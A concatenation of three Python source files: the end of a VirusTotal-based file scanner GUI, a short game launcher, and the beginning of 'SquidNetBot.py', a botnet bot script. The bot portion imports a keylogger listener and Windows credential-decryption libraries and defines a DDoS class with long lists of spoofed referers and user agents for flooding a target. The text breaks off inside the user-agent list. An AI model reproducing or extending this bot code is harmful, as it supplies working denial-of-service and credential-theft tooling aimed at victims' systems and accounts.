sleep(0.5)
self.curent_scan_file_label.config(text="")
self.bouton_start_scan.config(state=NORMAL)
self.bouton_scan_file.config(state=NORMAL)
self.bouton_scan_dir.config(state=NORMAL)
def start_scan(self):
"""
Start scan function.
"""
if len(self.Waiting_file_list) != 0:
if self.call_start_scan == False:
self.call_start_scan = True
self.scan_stopped = False
def scan_file(self):
"""
Send all files Waiting_file_list for analysis and send them to to correct list (OK or NOK list)
INFOMATIONS
-------
file_report_list [0] new scan [1] old scan (if file was already scan by you or someone else)
status code 200 = no problem, see https://developers.virustotal.com/reference#public-vs-private-api
File size limit is 32MB, in order to submit files up to 200MB in size you must request a special
upload URL using the /file/scan/upload_url endpoint
MAX_FILE_SIZE = 32 MO
"""
try:
nok_file_json_result = dict()
MAX_FILE_SIZE = 31000000
for file in self.Waiting_file_list:
if not self.call_start_scan:
raise virustotal_exception.stop_scan_call()
self.curent_scan_file_label.config(text="Scan file : " + file)
if getsize(file) > MAX_FILE_SIZE:
self.Waiting_file_list.remove(file)
self.update_waiting_list(self.Waiting_file_list)
print("===================================")
print("file :", file, " ; size > 32MB")
self.error_log_list.append("file :\n")
self.error_log_list.append(file)
self.error_log_list.append("\nOver limit size (file size > 32MB)")
self.error_log_list.append(
"\n============================================\n"
)
else:
scan_file_needed = True
check_report_loop = True
file_positive = 0
# get sha256
scan_sha256 = ""
with open(file, "rb") as file_test:
hash_sha_256 = sha256()
hash_sha_256.update(file_test.read())
scan_sha256 = str(hash_sha_256.hexdigest())
if self.force_scan:
check_report_loop = False
scan_file_needed = True
else:
check_report_loop = True
# check report
while check_report_loop:
if not self.call_start_scan:
raise virustotal_exception.stop_scan_call()
file_report = vtotal.file_report([scan_sha256])
if file_report["status_code"] == 200:
try:
scan_date = file_report["json_resp"]["scan_date"]
scan_date_years = int(scan_date.split("-")[0])
scan_date_month = int(scan_date.split("-")[1])
scan_date_day = int(
scan_date.split("-")[2].split(" ")[0]
)
scan_date = datetime.datetime(
year=scan_date_years,
month=scan_date_month,
day=scan_date_day,
)
if (
datetime.datetime.now() - scan_date
) < datetime.timedelta(days=14):
file_positive += file_report["json_resp"][
"positives"
]
scan_file_needed = False
if file_report["json_resp"]["positives"] != 0:
nok_file_json_result = file_report["json_resp"][
"scans"
]
else:
scan_file_needed = True
except KeyError as ker:
print("file", file, "never scan")
print(ker, "not found")
scan_file_needed = True
check_report_loop = False
elif file_report["status_code"] == 204:
# https://developers.virustotal.com/reference#public-vs-private-api
print("Request rate limit exceeded")
print("File :", file)
sleep(10)
else:
print("===================================")
print("ERROR on file :")
print(file)
print("JSON received :")
print(file_report)
self.error_log_list.append("ERROR on file :\n")
self.error_log_list.append(file)
self.error_log_list.append("\nJSON received :\n")
self.error_log_list.append(file_report)
self.error_log_list.append(
"\n============================================\n"
)
sleep(1)
sleep(1)
# scan file
if scan_file_needed:
json_resp_loop = True
while json_resp_loop:
file_request = vtotal.file_scan(file)
if file_request["status_code"] == 200:
file_info = file_request["json_resp"]
scan_id = str(file_info["scan_id"])
scan_sha256 = str(file_info["sha256"])
sleep(5)
file_report = vtotal.file_report([scan_id, scan_sha256])
json_resp = file_report["json_resp"]
if str(json_resp[0]["response_code"]) != "-2":
file_positive += file_report["json_resp"][0][
"positives"
]
else:
while str(json_resp[0]["response_code"]) == "-2":
sleep(5)
file_report = vtotal.file_report(
[scan_id, scan_sha256]
)
if file_report["status_code"] == 200:
json_resp = file_report["json_resp"]
file_positive += file_report["json_resp"][0][
"positives"
]
if file_report["json_resp"]["positives"] != 0:
nok_file_json_result = file_report["json_resp"][
"scans"
]
json_resp_loop = False
else:
print("===================================")
print("NOK file :")
print(file)
print("JSON received :")
print(file_report)
self.error_log_list.append("NOK file :\n")
self.error_log_list.append(file)
self.error_log_list.append("\nJSON received :\n")
self.error_log_list.append(file_report)
self.error_log_list.append(
"\n============================================\n"
)
sleep(2)
self.Waiting_file_list.remove(file)
self.update_waiting_list(self.Waiting_file_list)
if file_positive == 0:
self.OK_file_list.append(file)
self.update_ok_list(self.OK_file_list)
else:
self.NOK_file_list.append(file)
self.update_Nok_list(self.NOK_file_list)
self.Nok_file_list_scan_result_dict[file] = nok_file_json_result
self.curent_scan_file_label.config(text="")
if len(self.Waiting_file_list) != 0:
self.scan_file()
self.call_start_scan = False
self.scan_stopped = True
except virustotal_exception.stop_scan_call:
print("stop scan called")
self.scan_stopped = True
self.call_start_scan = False
except Exception as ex:
print(ex)
raise ex
|
main.py
|
import asyncio
import sys
import threading
from monkey_patched.game import Game
# Init components
game = Game()
def start_server(loop):
from backend.server import main
threading.Thread(target=main, args=(loop,)).start()
def test_server(loop, rand_sleep=False):
from api_tester import ApiTester
threading.Thread(target=ApiTester(loop, rand_sleep=rand_sleep).start_test).start()
def run_ui():
from board_drawing import BDManager
BDManager()
if __name__ == '__main__':
_loop = asyncio.get_event_loop()
start_server(_loop)
if sys.argv.__len__() > 1 and sys.argv[1] == 'test':
test_server(_loop, rand_sleep=False)
run_ui()
|
SquidNetBot.py
|
#-----SquidNet-Bot-Script-----#
import socket, time, os, threading, urllib.request, shutil, sys, random, base64, sqlite3, json, subprocess, re, shutil, ctypes
from datetime import datetime, timedelta
try:
from pynput.keyboard import Listener # pip install pynput
except:
pass
try:
import win32crypt # pip install pypiwin32
except:
pass
try:
from cryptography.fernet import Fernet # pip install cryptography
except:
pass
try:
from Crypto.Cipher import AES # pip install pycryptodome
except:
pass
class DDoS:
def __init__(self, ip, delay):
self.ip = ip
self.delay = delay
self.stopatk = False
self.useragents = self.obtain_user_agents()
self.referers = self.obtain_referers()
self.threader = threading.Thread(target=self.start_thr)
self.threader.start()
def obtain_referers(self):
referers = ['http://www.google.com/?q=', 'http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..',
'http://vk.com/profile.php?redirect=', 'http://www.usatoday.com/search/results?q=',
'http://engadget.search.aol.com/search?q=query?=query=..',
'https://www.google.ru/#hl=ru&newwindow=1?&saf..,or.r_gc.r_pw=?.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=882',
'https://www.google.ru/#hl=ru&newwindow=1&safe..,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=925',
'http://yandex.ru/yandsearch?text=',
'https://www.google.ru/#hl=ru&newwindow=1&safe..,iny+gay+q=pcsny+=;zdr+query?=poxy+pony&gs_l=hp.3.r?=.0i19.505.10687.0.10963.33.29.4.0.0.0.242.4512.0j26j3.29.0.clfh..0.0.dLyKYyh2BUc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp?=?fd2cf4e896a87c19&biw=1389&bih=832',
'http://go.mail.ru/search?mail.ru=1&q=', 'http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..',
'http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..',
'http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..',
'http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..',
'http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..',
'/#hl=en-US?&newwindow=1&safe=off&sclient=psy=?-ab&query=%D0%BA%D0%B0%Dq=?0%BA+%D1%83%()_D0%B1%D0%B=8%D1%82%D1%8C+%D1%81bvc?&=query&%D0%BB%D0%BE%D0%BD%D0%B0q+=%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+%D1%87%D0%BB%D0%B5%D0%BD&oq=q=%D0%BA%D0%B0%D0%BA+%D1%83%D0%B1%D0%B8%D1%82%D1%8C+%D1%81%D0%BB%D0%BE%D0%BD%D0%B0+%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D1%DO%D2%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+?%D1%87%D0%BB%D0%B5%D0%BD&gs_l=hp.3...192787.206313.12.206542.48.46.2.0.0.0.190.7355.0j43.45.0.clfh..0.0.ytz2PqzhMAc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=?882',
'http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..',
'http://www.google.ru/url?sa=t&rct=?j&q=&e..',
'http://help.baidu.com/searchResult?keywords=', 'http://www.bing.com/search?q=',
'https://www.yandex.com/yandsearch?text=', 'https://duckduckgo.com/?q=',
'http://www.ask.com/web?q=',
'http://search.aol.com/aol/search?q=', 'https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=',
'https://drive.google.com/viewerng/viewer?url=', 'http://validator.w3.org/feed/check.cgi?url=',
'http://host-tracker.com/check_page/?furl=',
'http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=',
'http://jigsaw.w3.org/css-validator/validator?uri=', 'https://add.my.yahoo.com/rss?url=',
'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=',
'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=',
'http://www.ted.com/search?q=',
'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=',
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=',
'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=',
'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=',
'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=',
'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=',
'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=',
'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=',
'http://ytmnd.com/search?q=',
'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=',
'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=',
'http://www.ted.com/search?q=',
'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=',
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=',
'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=',
'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=',
'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=',
'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=',
'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=',
'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=',
'http://ytmnd.com/search?q=',
'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=',
'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=',
'http://www.ted.com/search?q=',
'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=',
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=',
'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=',
'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=',
'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=',
'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=',
'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=',
'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=',
'http://ytmnd.com/search?q=',
'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=',
'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=',
'http://www.ted.com/search?q=',
'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=',
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=',
'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=',
'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=',
'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=',
'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=',
'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=',
'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=',
'http://ytmnd.com/search?q=',
'https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=',
'http://www.google.com/?q=', 'https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=',
'https://drive.google.com/viewerng/viewer?url=', 'http://www.google.com/translate?u=',
'https://developers.google.com/speed/pagespeed/insights/?url=',
'http://help.baidu.com/searchResult?keywords=', 'http://www.bing.com/search?q=',
'https://add.my.yahoo.com/rss?url=', 'https://play.google.com/store/search?q=',
'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=']
return referers
def obtain_user_agents(self):
user_agents = ['Mozilla/5.0 (Amiga; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14',
'Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en-US; rv:1.8.1.21) Gecko/20090303 SeaMonkey/1.1.15',
'Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14',
'Mozilla/5.0 (Android 2.2; Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4',
'Mozilla/5.0 (BeOS; U; BeOS BeBox; fr; rv:1.9) Gecko/2008052906 BonEcho/2.0',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.1) Gecko/20061220 BonEcho/2.0.0.1',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.10) Gecko/20071128 BonEcho/2.0.0.10',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.17) Gecko/20080831 BonEcho/2.0.0.17',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.6) Gecko/20070731 BonEcho/2.0.0.6',
'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.7) Gecko/20070917 BonEcho/2.0.0.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
